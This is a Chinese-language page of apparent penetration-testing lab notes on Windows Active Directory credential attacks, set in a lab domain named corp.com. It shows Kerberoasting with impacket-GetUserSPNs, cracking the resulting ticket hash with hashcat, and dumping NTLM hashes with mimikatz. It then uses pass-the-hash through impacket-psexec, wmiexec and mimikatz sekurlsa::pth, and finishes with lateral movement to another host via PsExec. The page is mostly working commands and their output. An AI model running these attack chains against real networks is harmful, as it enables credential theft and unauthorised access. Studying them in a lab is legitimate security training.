跳到主內容

【Windows】登入方法

密碼

取得方法:

  • 密碼噴灑
    • crackmapexe
  • hash破解
# impacket-GetUserSPNs => Kerberoasting攻擊 取得hash
# hashcat 破解

sudo impacket-GetUserSPNs -request -dc-ip 192.168.198.70 corp.com/meg
http/files04.corp.com   backupuser   CN=Domain Admins,CN=Users,DC=corp,DC=com  2023-12-11 10:36:14.564895  <never>                                   
...
[-] CCache file is not found. Skipping...
$krb5tgs$23$*backupuser$CORP.COM$corp.com/backupuser*$096b74a0a8eadb71d68c1d148eeb9dda$4b0294e2de695f87fa4a024eefafc6ef689ef17e2662f3884c68ebc7cb19f15fe2e82264fa4eb1987584b296426d085463faf4bacf97d70e247449159353d5803fbefdf64734bb42e06a1de083ca392fd5325c42bc1ec23f7781c341f143ce5872ee1b6fcb1eda292514b687b7f36fe97b6d8dbb00060264af8efc7a027470fac2bc480a540b4d282d7a6fd92ebb177941170bde251871b162c7cb52423e5a3265e84fdd9354f42754f4969ac790189cd10e3884ed3f7ddef68ea5e1f8339b06d4ff4f504012f9bfc904d4c27bec891141e473c6b1240433233a5dac4943df3440a4761381e705a4f5cb91924e12322c7dd975734f200ab2609edf9996f77b1c2e121578db8e0e217b539badf48cecc15f3a4ce093af2ca2d6b2ec225586166b77d77a4a3885dace734e7b1447ba68e4e62b1c8bfd50364a73a9e7c38c4b665657417cb7df49482bf4c17429b0b0737e13f3da403be9133a2e98d32a9537bed14c146715a34f415e71c28684d8c6afcd022e61daa0d6d1c93e030f7f90043ad84b616ca46a10a883b3a5fa01dc1eb215806a35ba1f5d8f9cfeb3fe5ca1e03d6478127b45d165d9b4a598d9d29c97e33895dcbf3844ca5faa38a4ba4b19b4a268f21a44e6f40bb7fa9e0b1a481f29f42bdd60df61609755b7f1da9c75ff6685005ce2882b9a0b98d0781eca0f560545180f01c63611c57b47bd222721a5465b95823bf2a8da33115ca52bea80004367694e9e23738300e5bb5294da55846ddc1f3ebd3e3d13ec932a1c7fa8b439d3c452d7899c1fae03ae8078a25c2f61ec91bdbefdd08687636bd45497393249470e4b2ec2ac2877bf57648a06ba432fac6a9995bc53dc8e8e5cebd49bfec93bd4f6e5e2c7639f4310c7e0ea348c3cadf7a5b443a52a53957d04d1bdf30370983f21e2306869a7db7abc13df9416df85eb85e71a0669c8cb2d4ee9a9030eac5c421f0108d8ba763f3102e57d5a220f2bda97693cd1493c9f494298d7ca057fe39bc2ee1213990b8b00bbe1f076d852f171a18a7e5c496b963c61e4c63b7197e0e7500afeaf192e6d84f2694e83df5aef914452bbbc5387cefc0ac906d8a1f11258f89a8bd3651bd5a0ed2e2609f22ee825646e422826413030318cb29df4b04a66b50e2f519007e36942049034e30b13c5d96662a846fe56f524066bedadf246ce6a4a3d1453b664a5dbae36bf5b8361b6a7b7540fb8154404f8c677b70c0b89769293aa5915e77efa1c2c0318bf55755a493e32487a7e37b676b661209aa47f85e9e482072cfbaf18485322b475f0
...
hash -> hashes.kerberoast3 
...
sudo hashcat -m 13100 hashes.kerberoast3 /usr/share/wordlists/rockyou.txt -r demo.rule --force

image-1708138898385.png


NTLM

取得方法:

mimikatz.exe + impacket-psexec

C:\tools\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
...
 [00000003] Primary
         * Username : maria
         * Domain   : CORP
         * NTLM     : 2a944a58d4ffa77137b2c587e6ed7626
...
#impacket-psexec -hashes :{ntlm} {username}@{ip}
impacket-psexec -hashes :2a944a58d4ffa77137b2c587e6ed7626 maria@192.168.198.70
C:\tools\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

 


NTLM

C:\tools\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
Authentication Id : 0 ; 2421341 (00000000:0024f25d)
Session           : RemoteInteractive from 2
User Name         : offsec
Domain            : CLIENT74
Logon Server      : CLIENT74
Logon Time        : 2/20/2024 3:50:48 AM
SID               : S-1-5-21-4060895957-195960390-4124122524-1001
        msv :
         [00000003] Primary
         * Username : offsec
         * Domain   : CLIENT74
         * NTLM     : 2892d26cdf84d7a70e2eb3b9f05c425e
         * SHA1     : a188967ac5edb88eca3301f93f756ca8e94013a3
        tspkg :
        wdigest :
         * Username : offsec
         * Domain   : CLIENT74
         * Password : (null)
        kerberos :
         * Username : offsec
         * Domain   : CLIENT74
         * Password : (null)
/usr/bin/impacket-wmiexec -hashes :2892d26cdf84d7a70e2eb3b9f05c425e Administrator@192.168.233.72
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>

...登入

NTLM(pth)

Authentication Id : 0 ; 1044456 (00000000:000fefe8)
Session           : RemoteInteractive from 2
User Name         : offsec
Domain            : CLIENT76
Logon Server      : CLIENT76
Logon Time        : 2/20/2024 7:33:53 AM
SID               : S-1-5-21-1798880304-3042387037-2047428623-1001
        msv :
         [00000003] Primary
         * Username : offsec
         * Domain   : CLIENT76
         * NTLM     : 2892d26cdf84d7a70e2eb3b9f05c425e
         * SHA1     : a188967ac5edb88eca3301f93f756ca8e94013a3
        tspkg :
        wdigest :
         * Username : offsec
         * Domain   : CLIENT76
         * Password : (null)
        kerberos :
         * Username : offsec
         * Domain   : CLIENT76
         * Password : (null)
        ssp :
        credman :
mimikatz # sekurlsa::pth /user:Administrator /domain:corp.com /ntlm:2892d26cdf84d7a70e2eb3b9f05c425e /run:powershell
user    : Administrator
domain  : corp.com
program : powershell
impers. : no
NTLM    : 2892d26cdf84d7a70e2eb3b9f05c425e
  |  PID  4432
  |  TID  4276
  |  LSA Process is now R/W
  |  LUID 0 ; 1854542 (00000000:001c4c4e)
  \_ msv1_0   - data copy @ 00000243D6EF4280 : OK !
  \_ kerberos - data copy @ 00000243D6FA2B78
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 00000243D6FBE418 (32) -> null

# 使用administraotr 開新powershell
PS C:\Windows\system32> whoami
client76\offsec
# 雖然還是offsec,但以切換admin hash

PS C:\Windows\system32> klist

Current LogonId is 0:0x1c4c4e

# no tickets
Cached Tickets: (0)
# 連線 web04
PS C:\Windows\system32> net use \\web04
The command completed successfully.

# 有 2 tickets
PS C:\Windows\system32> klist

Current LogonId is 0:0x1c4c4e

Cached Tickets: (2)

#0>     Client: Administrator @ CORP.COM
        Server: krbtgt/CORP.COM @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 12/10/2023 10:52:33 (local)
        End Time:   12/10/2023 20:52:33 (local)
        Renew Time: 12/17/2023 10:52:33 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: DC1.corp.com

#1>     Client: Administrator @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 12/10/2023 10:52:33 (local)
        End Time:   12/10/2023 20:52:33 (local)
        Renew Time: 12/17/2023 10:52:33 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: DC1.corp.com
        
# 使用 PsExec.exe 連線 web04
PS C:\Windows\system32> C:\tools\SysinternalsSuite\PsExec.exe \\web04 cmd

PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

# 移動到web04
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
corp\administrator

C:\Windows\system32>
# .... 橫移成功 do something